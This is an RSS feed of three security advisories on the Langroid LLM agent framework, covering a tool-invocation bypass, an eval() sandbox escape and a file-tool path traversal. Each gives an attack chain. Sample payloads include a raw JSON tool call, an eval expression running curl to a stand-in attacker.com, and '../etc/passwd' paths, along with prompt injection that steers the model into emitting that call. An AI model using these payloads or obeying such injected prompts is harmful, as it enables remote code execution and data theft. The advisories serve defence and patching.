<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Langroid - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/vendors/langroid/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 06 Jul 2026 20:45:48 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/vendors/langroid/feed.xml" rel="self" type="application/rss+xml"/><item><title>Langroid Tool Invocation Bypass via Unverified User Messages (CVE-2026-54771)</title><link>https://feed.craftedsignal.io/briefs/2026-07-langroid-tool-invocation-bypass/</link><pubDate>Mon, 06 Jul 2026 20:45:48 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-langroid-tool-invocation-bypass/</guid><description>A high-severity vulnerability, CVE-2026-54771, in Langroid applications allows untrusted users to directly invoke internal tools via raw JSON payloads, even when these tools are configured not to be used by the LLM, enabling malicious actors to bypass security controls and execute sensitive operations like file read/write, database queries, or access to internal orchestration tools.</description><content:encoded><![CDATA[<p>A critical logic flaw (CVE-2026-54771) has been identified in Langroid applications, affecting versions up to and including 0.65.2. This vulnerability allows untrusted users interacting with a chat interface to directly invoke internal application tools by supplying raw JSON payloads. The <code>handle_message()</code> function within the <code>ChatAgent</code> lacks proper sender verification, permitting tools registered with <code>use=False, handle=True</code> to be executed, which developers might mistakenly believe are protected from direct user invocation. This bypass of intended security controls can lead to unauthorized actions such as file system manipulation, database command execution, or control over internal orchestration tools, posing a significant risk of remote code execution or sensitive data compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker, as an untrusted user, interacts with a vulnerable Langroid chat application.</li>
<li>The attacker crafts a malicious chat message containing a raw JSON payload designed to invoke a specific internal tool, for example, <code>{&quot;request&quot;:&quot;secret_tool&quot;,&quot;value&quot;:&quot;pwned&quot;}</code>.</li>
<li>The Langroid <code>ChatAgent</code> receives the user's message as input.</li>
<li>The <code>agent.handle_message()</code> function is called to process the user's input.</li>
<li>Inside <code>handle_message()</code>, the <code>get_tool_messages()</code> method parses the raw JSON from the user message, identifying it as a valid <code>ToolMessage</code> invocation.</li>
<li>Despite the tool (e.g., <code>SecretTool</code>) being configured with <code>use=False, handle=True</code>, indicating it should not be directly generated by the LLM or exposed to end-users, its <code>handle()</code> method is directly executed.</li>
<li>The <code>handle()</code> method performs its intended action, which, depending on the tool, could include reading/writing files, executing database queries, or interacting with internal systems.</li>
<li>The attacker successfully bypasses security mechanisms to achieve unauthorized execution of internal tools, potentially leading to remote code execution or data exfiltration.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The impact of CVE-2026-54771 can be severe, leading to significant compromise of affected systems. Depending on the specific internal tools enabled within the Langroid application, attackers could achieve capabilities such as arbitrary file read and write, direct execution of database queries, or unauthorized access to and manipulation of internal orchestration systems. This could result in sensitive data exfiltration, system defacement, denial of service, or full remote code execution, undermining the integrity, confidentiality, and availability of the application and underlying infrastructure. Developers may have registered these tools with the belief that <code>use=False</code> provides sufficient protection, making this vulnerability particularly insidious.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately patch Langroid applications to a version greater than 0.65.2 to address CVE-2026-54771.</li>
<li>Review all <code>enable_message</code> configurations within your Langroid applications, especially for sensitive tools, to ensure that only trusted entities can invoke them.</li>
<li>Implement robust input validation and sanitization at the application boundary for all user-supplied chat inputs to prevent raw JSON tool payloads from reaching the <code>handle_message()</code> function.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>langroid</category><category>vulnerability</category><category>rce</category><category>logic-error</category><category>python</category></item><item><title>Langroid Sandbox Escape via Incomplete eval() Mitigation</title><link>https://feed.craftedsignal.io/briefs/2026-07-sandbox-escape-langroid/</link><pubDate>Mon, 06 Jul 2026 20:44:54 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-sandbox-escape-langroid/</guid><description>Langroid is vulnerable to a critical Remote Code Execution (RCE) in its `TableChatAgent` and `VectorStore` components when `full_eval=True` due to CVE-2026-54769; the `eval()` function fails to properly scrub `__builtins__` from `globals`, allowing attackers to inject `__import__('os').system()` calls via crafted prompt payloads, leading to unauthenticated RCE, unauthorized data access, or system compromise on the host running the Langroid agent.</description><content:encoded><![CDATA[<p>Attackers can exploit a critical sandbox escape vulnerability, CVE-2026-54769, in the Langroid framework (versions &lt;= 0.65.1) to achieve unauthenticated Remote Code Execution (RCE). This flaw specifically affects the <code>TableChatAgent</code> and <code>VectorStore</code> components when configured with <code>full_eval=True</code>. The vulnerability stems from an incomplete mitigation in Python's <code>eval()</code> function, where the <code>__builtins__</code> dictionary is not explicitly scrubbed from <code>globals</code>, despite attempts to set <code>locals</code> to an empty dictionary. This oversight allows attackers to use prompt injection to force the underlying Large Language Model (LLM) to generate tool calls that include <code>__import__('os').system()</code> commands, which are then executed by the vulnerable <code>eval()</code> function in <code>langroid/agent/special/table_chat_agent.py</code> or <code>langroid/vector_store/base.py</code>. This bypass permits arbitrary system command execution, posing a significant risk for data exfiltration, unauthorized database access, or full system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious prompt containing a tool call with an <code>expression</code> field set to a Python <code>os.system()</code> command (e.g., <code>__import__('os').system('curl http://attacker.com/pwned')</code>).</li>
<li>The attacker submits this crafted prompt to a Langroid application instance running a <code>TableChatAgent</code> or <code>VectorStore</code> configured with <code>full_eval=True</code> (e.g., Langroid version &lt;= 0.65.1).</li>
<li>The application's underlying Large Language Model (LLM) processes the malicious prompt and, as instructed, generates a tool message containing the attacker-controlled Python <code>expression</code>.</li>
<li>The Langroid agent's <code>eval()</code> function (specifically within <code>table_chat_agent.py</code> or <code>base.py</code>) attempts to execute this <code>expression</code> using <code>eval(code, vars, {})</code>.</li>
<li>Due to an incomplete sandboxing implementation, where <code>__builtins__</code> are implicitly available via <code>globals</code> despite an empty <code>locals</code> dictionary, the <code>__import__('os').system()</code> call within the <code>expression</code> is successfully resolved and executed.</li>
<li>The <code>os.system()</code> function invokes a new process on the host system to execute the embedded command (e.g., <code>curl</code> for C2 communication or <code>touch</code> for arbitrary file creation).</li>
<li>This unauthenticated command execution achieves Remote Code Execution (RCE), allowing the attacker to interact with the host system's operating system environment.</li>
<li>The RCE enables further actions such as unauthorized data exfiltration, privilege escalation, or full system compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows for a complete bypass of the application's intended security boundaries, directly enabling unauthenticated Remote Code Execution. The observed consequences include unauthorized database accesses, data exfiltration, or total system compromise, depending on the privileges of the user environment hosting the vulnerable Langroid agent process. Successful exploitation can lead to significant data breaches, loss of intellectual property, and extensive damage to the affected system and organization.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Patch Langroid to a version greater than 0.65.1 to mitigate CVE-2026-54769.</li>
<li>Block traffic to <code>attacker.com</code> at your network perimeter using the IOC provided in this brief.</li>
<li>Deploy the Sigma rules provided in this brief to detect suspicious process creation activities originating from Python processes.</li>
<li>Enable Sysmon process-creation logging (Event ID 1) on Windows or audit logging for process creation on Linux systems to ensure telemetry for the provided rules.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>rce</category><category>sandbox-escape</category><category>llm</category><category>python</category><category>supply-chain</category></item><item><title>Langroid File Tools Path Traversal Vulnerability (CVE-2026-50181)</title><link>https://feed.craftedsignal.io/briefs/2026-07-langroid-path-traversal/</link><pubDate>Fri, 03 Jul 2026 12:11:45 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-langroid-path-traversal/</guid><description>A path traversal vulnerability (CVE-2026-50181) exists in Langroid's `ReadFileTool` and `WriteFileTool` components (versions &lt;= 0.63.0), allowing an attacker to read or write arbitrary files outside the configured `curr_dir` via crafted `file_path` arguments, potentially leading to sensitive information disclosure or unauthorized file modification in applications exposing these tools to user or LLM input.</description><content:encoded><![CDATA[<p>A significant path traversal vulnerability, tracked as CVE-2026-50181, has been identified in Langroid's <code>ReadFileTool</code> and <code>WriteFileTool</code> components, affecting all versions up to and including 0.63.0. The vulnerability stems from the tools' failure to properly validate and enforce path boundaries after changing the process working directory to a <code>curr_dir</code> (current directory). While the tools intend to restrict file operations to this <code>curr_dir</code>, they do not resolve the user-supplied <code>file_path</code> to ensure it remains within this boundary. This oversight allows an attacker to use path traversal sequences, such as <code>../</code>, within the <code>file_path</code> argument to access files located outside the intended <code>curr_dir</code>. The impact is particularly critical for applications that expose these file tools to user-controlled input, Large Language Model (LLM) agents, or delegated coding/documentation agents, as it can lead to unauthorized reading of sensitive files (e.g., secrets, configuration files) or modification of arbitrary files, compromising data confidentiality and integrity. The issue is present in <code>langroid/agent/tools/file_tools.py</code> and <code>langroid/utils/system.py</code>.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Identify Vulnerable Application:</strong> An attacker identifies an application that integrates Langroid and exposes its <code>ReadFileTool</code> or <code>WriteFileTool</code> in a way that allows user-controlled input to influence the <code>file_path</code> argument (e.g., via an LLM agent interface or a user-facing API).</li>
<li><strong>Craft Malicious Path:</strong> The attacker crafts a <code>file_path</code> argument containing path traversal sequences, such as <code>../</code>, to reference a file outside the intended sandbox or working directory (e.g., <code>../etc/passwd</code> for reading, or <code>../malicious_script.sh</code> for writing).</li>
<li><strong>Invoke Vulnerable Tool:</strong> The attacker sends the crafted <code>file_path</code> as input to the application, which then passes it directly to an instance of <code>ReadFileTool</code> or <code>WriteFileTool</code>.</li>
<li><strong>Directory Change (Internal):</strong> Internally, the Langroid tool changes the process's current working directory to the configured <code>curr_dir</code> (e.g., <code>/var/app/sandbox/</code>).</li>
<li><strong>Unvalidated Path Resolution:</strong> The tool then proceeds to open or create the file using the provided <code>file_path</code> argument. Due to the lack of proper validation, the <code>../</code> sequences are honored, causing the path to resolve outside the <code>curr_dir</code> (e.g., <code>/var/etc/passwd</code>).</li>
<li><strong>Execute Unauthorized File Operation:</strong> The Langroid tool performs the requested operation (read or write) on the arbitrarily resolved file path outside the intended boundary.</li>
<li><strong>Information Disclosure / Data Modification:</strong> If <code>ReadFileTool</code> was used, the contents of the sensitive file are disclosed to the attacker. If <code>WriteFileTool</code> was used, the attacker can modify or create arbitrary files, potentially leading to further compromise, persistence, or data integrity violations.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability can severely impact applications that enable Langroid's file tools and rely on the <code>curr_dir</code> parameter to establish a secure sandbox, project, or workspace boundary. If exploited, an attacker can read files outside the intended workspace, leading to the exposure of sensitive local secrets, configuration files, source code, environment files, or other critical project-adjacent data. Conversely, by exploiting <code>WriteFileTool</code>, an attacker could modify or create arbitrary files outside the designated project directory, which could lead to code injection, defacement, or disruption of services. The severity of the impact is contingent on how the Langroid file tools are exposed and the nature of the application's file system structure.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li><strong>Patch CVE-2026-50181:</strong> Upgrade the Langroid library to a version patched for CVE-2026-50181 immediately.</li>
<li><strong>Implement Path Validation:</strong> For applications using Langroid file tools, implement robust path validation logic before passing any user-controlled or LLM-generated <code>file_path</code> arguments to <code>ReadFileTool</code> or <code>WriteFileTool</code>. Ensure all resolved paths remain strictly within the intended <code>curr_dir</code>.</li>
<li><strong>Review <code>curr_dir</code> Usage:</strong> Audit all instances where <code>ReadFileTool</code> and <code>WriteFileTool</code> are used, verifying that the <code>curr_dir</code> is correctly configured and that no sensitive files are reachable via path traversal from this directory.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>path-traversal</category><category>python-library</category><category>vulnerability</category><category>llm-agent</category></item></channel></rss>